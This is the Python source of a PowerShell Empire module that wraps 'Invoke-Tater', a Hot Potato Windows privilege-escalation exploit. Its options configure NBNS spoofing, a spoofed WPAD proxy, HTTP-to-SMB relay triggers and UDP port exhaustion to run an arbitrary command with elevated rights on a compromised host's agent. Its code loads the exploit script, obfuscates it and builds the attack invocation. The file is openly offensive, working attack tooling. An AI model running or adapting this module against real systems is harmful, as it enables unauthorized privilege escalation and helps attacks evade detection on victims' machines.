Codebase list powershell-empire / 0050f11 lib / modules / powershell / privesc / tater.py
0050f11

Tree @0050f11 (Download .tar.gz)

tater.py @0050f11raw · history · blame 

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
from __future__ import print_function

from builtins import object
from builtins import str

from lib.common import helpers


class Module(object):
    
    def __init__(self, mainMenu, params=[]):
        
        self.info = {
            'Name': 'Invoke-Tater',
            
            'Author': ['Kevin Robertson'],
            
            'Description': ('Tater is a PowerShell implementation of the Hot Potato '
                            'Windows Privilege Escalation exploit from @breenmachine and @foxglovesec.'),

            'Software': '',

            'Techniques': ['T1187'],

            'Background': True,
            
            'OutputExtension': None,
            
            'NeedsAdmin': False,
            
            'OpsecSafe': False,
            
            'Language': 'powershell',
            
            'MinLanguageVersion': '2',
            
            'Comments': [
                'https://github.com/Kevin-Robertson/Tater'
            ]
        }
        
        # any options needed by the module, settable during runtime
        self.options = {
            # format:
            #   value_name : {description, required, default_value}
            'Agent': {
                'Description': 'Agent to run module on.',
                'Required': True,
                'Value': ''
            },
            'IP': {
                'Description': 'Specific local IP address for NBNS spoofer.',
                'Required': False,
                'Value': ''
            },
            'SpooferIP': {
                'Description': 'IP address included in NBNS response. This is needed when using two hosts to get around an in-use port 80 on the privesc target.',
                'Required': False,
                'Value': ''
            },
            'Command': {
                'Description': 'Command to execute during privilege escalation. Do not wrap in quotes and use PowerShell character escapes where necessary.',
                'Required': True,
                'Value': ''
            },
            'NBNS': {
                'Description': 'Enable/Disable NBNS bruteforce spoofing (Y/N).',
                'Required': False,
                'Value': 'Y'
            },
            'NBNSLimit': {
                'Description': 'Enable/Disable NBNS bruteforce spoofer limiting to stop NBNS spoofing while hostname is resolving correctly (Y/N).',
                'Required': False,
                'Value': 'Y'
            },
            'Trigger': {
                'Description': 'Trigger type to use in order to trigger HTTP to SMB relay. 0 = None, 1 = Windows Defender Signature Update, 2 = Windows 10 Webclient/Scheduled Task',
                'Required': False,
                'Value': '1'
            },
            'ExhaustUDP': {
                'Description': 'Enable/Disable UDP port exhaustion to force all DNS lookups to fail in order to fallback to NBNS resolution (Y/N).',
                'Required': False,
                'Value': 'N'
            },
            'HTTPPort': {
                'Description': 'TCP port for the HTTP listener.',
                'Required': False,
                'Value': '80'
            },
            'Hostname': {
                'Description': 'Hostname to spoof. WPAD.DOMAIN.TLD may be required by Windows Server 2008.',
                'Required': False,
                'Value': 'WPAD'
            },
            'WPADDirectHosts': {
                'Description': 'Comma separated list of hosts to include as direct in the wpad.dat file. Note that localhost is always listed as direct. Add the Empire host to avoid catching Empire HTTP traffic.',
                'Required': False,
                'Value': ''
            },
            'WPADPort': {
                'Description': 'Proxy server port to be included in the wpad.dat file.',
                'Required': False,
                'Value': '80'
            },
            'TaskDelete': {
                'Description': 'Enable/Disable scheduled task deletion for trigger 2. If enabled, a random string will be added to the taskname to avoid failures after multiple trigger 2 runs.',
                'Required': False,
                'Value': 'Y'
            },
            'Taskname': {
                'Description': 'Scheduled task name to use with trigger 2. If you observe that Tater does not work after multiple trigger 2 runs, try changing the taskname.',
                'Required': False,
                'Value': 'Empire'
            },
            'RunTime': {
                'Description': 'Run time duration in minutes.',
                'Required': False,
                'Value': ''
            }
        }
        
        # save off a copy of the mainMenu object to access external functionality
        #   like listeners/agent handlers/etc.
        self.mainMenu = mainMenu
        
        for param in params:
            # parameter format is [Name, Value]
            option, value = param
            if option in self.options:
                self.options[option]['Value'] = value
    
    def generate(self, obfuscate=False, obfuscationCommand=""):
        
        # read in the common module source code
        moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Invoke-Tater.ps1"
        if obfuscate:
            helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
            moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
        try:
            f = open(moduleSource, 'r')
        except:
            print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
            return ""
        
        moduleCode = f.read()
        f.close()
        
        script = moduleCode
        
        # set defaults for Empire
        scriptEnd = "\n" + 'Invoke-Tater -Tool "2" '
        
        for option, values in self.options.items():
            if option.lower() != "agent":
                if values['Value'] and values['Value'] != '':
                    if values['Value'].lower() == "true":
                        # if we're just adding a switch
                        scriptEnd += " -" + str(option)
                    else:
                        if "," in str(values['Value']):
                            quoted = '"' + str(values['Value']).replace(',', '","') + '"'
                            scriptEnd += " -" + str(option) + " " + quoted
                        else:
                            scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\""
        if obfuscate:
            scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd,
                                          obfuscationCommand=obfuscationCommand)
        script += scriptEnd
        script = helpers.keyword_obfuscation(script)

        return script